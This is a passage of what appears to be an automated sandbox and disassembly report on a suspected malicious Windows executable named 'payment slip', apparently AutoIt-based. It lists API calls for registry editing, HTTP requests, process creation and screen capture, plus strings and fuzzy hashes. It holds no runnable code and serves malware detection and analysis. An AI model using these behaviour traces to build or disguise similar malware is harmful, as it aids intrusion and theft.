                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000BC960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 8e489bba92ff70c9b4b99af9bb48023f7c43bc32a4f657935b35e4f6f3911155
                                        • Instruction ID: 9904c0e25ffc63980de01a3d473094635280f5632f521ee044f8dd8b57e3d3db
                                        • Opcode Fuzzy Hash: 8e489bba92ff70c9b4b99af9bb48023f7c43bc32a4f657935b35e4f6f3911155
                                        • Instruction Fuzzy Hash: C1127A756046019FEB25DF14C881FAAB7E5EF88314F14885DF88A9B3A2DB71ED41CB81
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 000C09C6
                                        • _wcslen.LIBCMT ref: 000C0A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C0A54
                                        • _wcslen.LIBCMT ref: 000C0A8A
                                        • _wcslen.LIBCMT ref: 000C0B06
                                        • _wcslen.LIBCMT ref: 000C0B81
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                          • Part of subcall function 00092BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00092BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        • Opcode ID: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                        • Instruction ID: 96468690354b633e399678357ec144fed286cec19ee39adced017b4ab1ca3574
                                        • Opcode Fuzzy Hash: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                        • Instruction Fuzzy Hash: 03E18771208701DFCB24DF28C450A6EB7E1BF98314F50895CF89A9B2A2DB31ED45CB82
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        • Opcode ID: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                        • Instruction ID: cc50837bd8fa4fe2cc758f67efca6daf17908fa968abcabef797570c03e6a215
                                        • Opcode Fuzzy Hash: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                        • Instruction Fuzzy Hash: 3971E33260412A8BEB20DE6CCD51DFF37D5ABA0758F250528FC56AB285EB35CD8493A1
                                        APIs
                                        • _wcslen.LIBCMT ref: 000C835A
                                        • _wcslen.LIBCMT ref: 000C836E
                                        • _wcslen.LIBCMT ref: 000C8391
                                        • _wcslen.LIBCMT ref: 000C83B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000C83F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000C5BF2), ref: 000C844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000C84CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8501
                                        • FreeLibrary.KERNEL32(?), ref: 000C850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000C851D
                                        • DestroyIcon.USER32(?,?,?,?,?,000C5BF2), ref: 000C852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000C8549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000C8555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00095A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00095A40
                                        • SetWindowTextW.USER32(?,?), ref: 00095A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 00095A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 00095A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 00095A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00095AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00095AC3
                                        • GetWindowRect.USER32(?,?), ref: 00095ACC
                                        • _wcslen.LIBCMT ref: 00095B33
                                        • SetWindowTextW.USER32(?,?), ref: 00095B6F
                                        • GetDesktopWindow.USER32 ref: 00095B75
                                        • GetWindowRect.USER32(00000000), ref: 00095B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00095BD3
                                        • GetClientRect.USER32(?,?), ref: 00095BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00095C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00095C2F
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000500C6
                                          • Part of subcall function 000500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0010070C,00000FA0,E6C5484A,?,?,?,?,000723B3,000000FF), ref: 0005011C
                                          • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000723B3,000000FF), ref: 00050127
                                          • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000723B3,000000FF), ref: 00050138
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0005014E
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0005015C
                                          • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0005016A
                                          • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00050195
                                          • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000501A0
                                        • ___scrt_fastfail.LIBCMT ref: 000500E7
                                          • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                        Strings
                                        • InitializeConditionVariable, xrefs: 00050148
                                        • WakeAllConditionVariable, xrefs: 00050162
                                        • SleepConditionVariableCS, xrefs: 00050154
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00050122
                                        • kernel32.dll, xrefs: 00050133
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,000CCC08), ref: 000A4527
                                        • _wcslen.LIBCMT ref: 000A453B
                                        • _wcslen.LIBCMT ref: 000A4599
                                        • _wcslen.LIBCMT ref: 000A45F4
                                        • _wcslen.LIBCMT ref: 000A463F
                                        • _wcslen.LIBCMT ref: 000A46A7
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                        • GetDriveTypeW.KERNEL32(?,000F6BF0,00000061), ref: 000A4743
                                        Strings
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 000C6DEB
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000C6E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000C6E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6E94
                                        • DestroyWindow.USER32(?), ref: 000C6EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000C6EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6EFD
                                        • GetDesktopWindow.USER32 ref: 000C6F16
                                        • GetWindowRect.USER32(00000000), ref: 000C6F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C6F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000C6F4D
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        Strings
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: U$0$tooltips_class32
                                        • API String ID: 2429346358-3917125686
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 000C9147
                                          • Part of subcall function 000C7674: ClientToScreen.USER32(?,?), ref: 000C769A
                                          • Part of subcall function 000C7674: GetWindowRect.USER32(?,?), ref: 000C7710
                                          • Part of subcall function 000C7674: PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000C91B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000C91BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000C91DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000C9225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000C923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9277
                                        • DragFinish.SHELL32(?), ref: 000C927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000C9371
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: U$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-757269100
                                        APIs
                                        • _wcslen.LIBCMT ref: 000BB198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1D4
                                        • _wcslen.LIBCMT ref: 000BB200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB236
                                        • _wcslen.LIBCMT ref: 000BB332
                                          • Part of subcall function 000A05A7: GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                        • _wcslen.LIBCMT ref: 000BB34B
                                        • _wcslen.LIBCMT ref: 000BB366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BB3B6
                                        • GetLastError.KERNEL32(00000000), ref: 000BB407
                                        • CloseHandle.KERNEL32(?), ref: 000BB439
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB44A
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB45C
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB46E
                                        • CloseHandle.KERNEL32(?), ref: 000BB4E3
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        APIs
                                        • GetMenuItemCount.USER32(00101990), ref: 00072F8D
                                        • GetMenuItemCount.USER32(00101990), ref: 0007303D
                                        • GetCursorPos.USER32(?), ref: 00073081
                                        • SetForegroundWindow.USER32(00000000), ref: 0007308A
                                        • TrackPopupMenuEx.USER32(00101990,00000000,?,00000000,00000000,00000000), ref: 0007309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000730A9
                                        Strings
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000C5504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C5515
                                        • CharNextW.USER32(00000158), ref: 000C5544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000C5585
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000C559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C55AC
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID: U$more than two branches
                                        • API String ID: 1350042424-2723945405
                                        APIs
                                          • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                        • DestroyWindow.USER32(?), ref: 00048C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00086973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000), ref: 000869D4
                                        • DeleteObject.GDI32(00000000), ref: 000869E6
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID: U
                                        • API String ID: 641708696-2399391058
                                        • Opcode ID: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                        • Instruction ID: b708711d5dcd142c9c273a3fe36a910396930281fd33be29a12bfc598ebf2fbc
                                        • Opcode Fuzzy Hash: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                        • Instruction Fuzzy Hash: C3618F70502610EFDB35AF14D988B2D77F1FB40316F15892DE086979A0CB7AA9C0CF59
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 000AC5FB
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                        • Instruction ID: 11b651ea5bc8e67933e2d4d2cb9fd2c4018ef2b4f1ea5e0a2fa157deb7b4f59b
                                        • Opcode Fuzzy Hash: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                        • Instruction Fuzzy Hash: FE516DB0500604BFFB218FA0C948EAB7BFCFF09744F014519F94A96610DB34E944DB60
                                        APIs
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetSysColor.USER32(0000000F), ref: 00049862
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID: U
                                        • API String ID: 259745315-2399391058
                                        • Opcode ID: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                        • Instruction ID: d3703ca40d5d1052f4d57c946c56ec68ed54d76aedda3dbd9d73367a23782f0e
                                        • Opcode Fuzzy Hash: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                        • Instruction Fuzzy Hash: 32417271104640AFEB205B3DDC44FBA3BA5BB06330F284669FAA6871E5DB759C42DB24
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 000C8592
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85AD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85BA
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85D7
                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85F8
                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,000CFC38,?), ref: 000C8611
                                        • GlobalFree.KERNEL32(00000000), ref: 000C8621
                                        • GetObjectW.GDI32(?,00000018,?), ref: 000C8641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 000C8671
                                        • DeleteObject.GDI32(?), ref: 000C8699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000C86AF
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                        • Instruction ID: 32152631a708fe18898ae450fa3a062024e5e919e0ada5931f875db4321d4c9d
                                        • Opcode Fuzzy Hash: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                        • Instruction Fuzzy Hash: BF410A75600204BFEB119FA5DD88EAE7BB8FF89711F148058F909E7260DB749D01DB64
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 000A1502
                                        • VariantCopy.OLEAUT32(?,?), ref: 000A150B
                                        • VariantClear.OLEAUT32(?), ref: 000A1517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000A15FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 000A1657
                                        • VariantInit.OLEAUT32(?), ref: 000A1708
                                        • SysFreeString.OLEAUT32(?), ref: 000A178C
                                        • VariantClear.OLEAUT32(?), ref: 000A17D8
                                        • VariantClear.OLEAUT32(?), ref: 000A17E7
                                        • VariantInit.OLEAUT32(00000000), ref: 000A1823
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 8c44fad5b39a1136eae997b95d333485897a1f87b48dcf84d5e24fbacd6b4de8
                                        • Instruction ID: bc6d2083f92c7e82dcec5c2161a838949098f11ef6d39a15563569aeb92b7912
                                        • Opcode Fuzzy Hash: 8c44fad5b39a1136eae997b95d333485897a1f87b48dcf84d5e24fbacd6b4de8
                                        • Instruction Fuzzy Hash: FCD10E71E00A05EBEB209FA4D895BFDB7B5BF46700F10806AE456AF181DB30EC41DBA1
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BB6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BB772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 000BB80A
                                        • RegCloseKey.ADVAPI32(?), ref: 000BB87E
                                        • RegCloseKey.ADVAPI32(?), ref: 000BB89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000BB8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BB904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BB922
                                        • FreeLibrary.KERNEL32(00000000), ref: 000BB983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BB994
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
                                        • Opcode ID: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                        • Instruction ID: 96951f22c13feca6e884b6fae4d2f18ea9b4bc551357cb50b1bb8483d6b836d8
                                        • Opcode Fuzzy Hash: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
                                        • Instruction Fuzzy Hash: F1C1AF34208201AFD725DF14C494FAABBE5FF85318F14845CF59A8B2A2CBB5ED45CB91
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C8D5A
                                        • GetFocus.USER32 ref: 000C8D6A
                                        • GetDlgCtrlID.USER32(00000000), ref: 000C8D75
                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 000C8E1D
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000C8ECF
                                        • GetMenuItemCount.USER32(?), ref: 000C8EEC
                                        • GetMenuItemID.USER32(?,00000000), ref: 000C8EFC
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000C8F2E
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000C8F70
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C8FA1
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                        • String ID: U$0
                                        • API String ID: 1026556194-4222668077
                                        • Opcode ID: bfca432566387508896ddc6c2c5d7d327a812ea98004c2f1074f1c4d32989e2b
                                        • Instruction ID: 1a384850197eca238cbc91ad6a4d1256e79804a3969b1575ace1fbe96f2080a5
                                        • Opcode Fuzzy Hash: bfca432566387508896ddc6c2c5d7d327a812ea98004c2f1074f1c4d32989e2b
                                        • Instruction Fuzzy Hash: AD818C71508301ABE750CF24C884FAF7BE9FB89314F04892DF98997292DB74D941CBA5
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000B25D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
                                        • CreateCompatibleDC.GDI32(?), ref: 000B25F4
                                        • SelectObject.GDI32(00000000,?), ref: 000B2601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000B26AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
                                        • SelectObject.GDI32(?,?), ref: 000B26D8
                                        • DeleteObject.GDI32(?), ref: 000B26E1
                                        • DeleteDC.GDI32(?), ref: 000B26E8
                                        • ReleaseDC.USER32(00000000,?), ref: 000B26F3
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 1a21e7de8541ee85219593af8c0ec26de49ec94e307cf2115521eb43e74131e5
                                        • Instruction ID: 876d65c138f2d1a39dfb8c82251c390dfd0dd135ce49638b08bbf1eb2e81fef2
                                        • Opcode Fuzzy Hash: 1a21e7de8541ee85219593af8c0ec26de49ec94e307cf2115521eb43e74131e5
                                        • Instruction Fuzzy Hash: F861F0B5D00219EFDB14CFA8D884EEEBBB5FF48310F248529E959A7250D774A9418FA0
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0006DAA1
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D659
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D66B
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D67D
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D68F
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6A1
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6B3
